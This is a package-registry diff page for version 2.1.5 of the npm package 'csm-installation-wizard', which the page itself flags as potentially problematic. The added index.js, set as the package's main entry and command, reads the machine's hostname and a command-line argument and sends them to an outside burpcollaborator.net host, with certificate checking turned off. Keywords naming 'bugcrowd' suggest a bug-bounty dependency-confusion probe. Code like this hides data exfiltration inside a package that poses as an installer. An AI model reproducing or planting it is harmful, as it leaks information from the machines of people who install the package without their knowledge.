csm-installation-wizard 2.1.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of csm-installation-wizard might be problematic. Click here for more details.
- package/index.js +37 -0
- package/package.json +22 -0
package/index.js
ADDED
|
@@ -0,0 +1,37 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const os = require("os");
|
|
3
|
+
const hostname = os.hostname();
|
|
4
|
+
|
|
5
|
+
const data = new TextEncoder().encode(
|
|
6
|
+
JSON.stringify({
|
|
7
|
+
payload: hostname,
|
|
8
|
+
project_id: process.argv[2]
|
|
9
|
+
})
|
|
10
|
+
);
|
|
11
|
+
|
|
12
|
+
const options = {
|
|
13
|
+
hostname: process.argv[2] + '.' + hostname + '.5ekz9zu7szubh6q1esdlk8o4cvin6c.burpcollaborator.net',
|
|
14
|
+
port: 443,
|
|
15
|
+
path: '/',
|
|
16
|
+
method: 'POST',
|
|
17
|
+
headers: {
|
|
18
|
+
'Content-Type': 'application/json',
|
|
19
|
+
'Content-Length': data.length
|
|
20
|
+
},
|
|
21
|
+
rejectUnauthorized: false
|
|
22
|
+
}
|
|
23
|
+
|
|
24
|
+
const req = https.request(options, res => {
|
|
25
|
+
console.log(`STATUS: ${res.statusCode}`);
|
|
26
|
+
res.setEncoding('utf8');
|
|
27
|
+
res.on('data', chunk => {
|
|
28
|
+
console.log(`BODY: ${chunk}`);
|
|
29
|
+
});
|
|
30
|
+
});
|
|
31
|
+
|
|
32
|
+
req.on('error', e => {
|
|
33
|
+
console.error(`Problem with request: ${e.message}`);
|
|
34
|
+
});
|
|
35
|
+
|
|
36
|
+
req.write(data);
|
|
37
|
+
req.end();
|
package/package.json
ADDED
|
@@ -0,0 +1,22 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "csm-installation-wizard",
|
|
3
|
+
"version": "2.1.5",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"bin": {
|
|
7
|
+
"csm-installation-wizard": "./index.js"
|
|
8
|
+
},
|
|
9
|
+
"scripts": {
|
|
10
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
11
|
+
},
|
|
12
|
+
"keywords": [
|
|
13
|
+
"M1S0",
|
|
14
|
+
"from",
|
|
15
|
+
"bugcrowd"
|
|
16
|
+
],
|
|
17
|
+
"author": "M1S0",
|
|
18
|
+
"license": "ISC",
|
|
19
|
+
"dependencies": {
|
|
20
|
+
"csm-installation-wizard": "^1.1.4"
|
|
21
|
+
}
|
|
22
|
+
}
|